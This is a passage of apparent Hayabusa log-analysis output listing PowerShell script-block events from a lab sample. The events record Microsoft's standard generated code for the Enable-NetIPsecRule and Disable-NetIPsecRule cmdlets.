[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_va",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 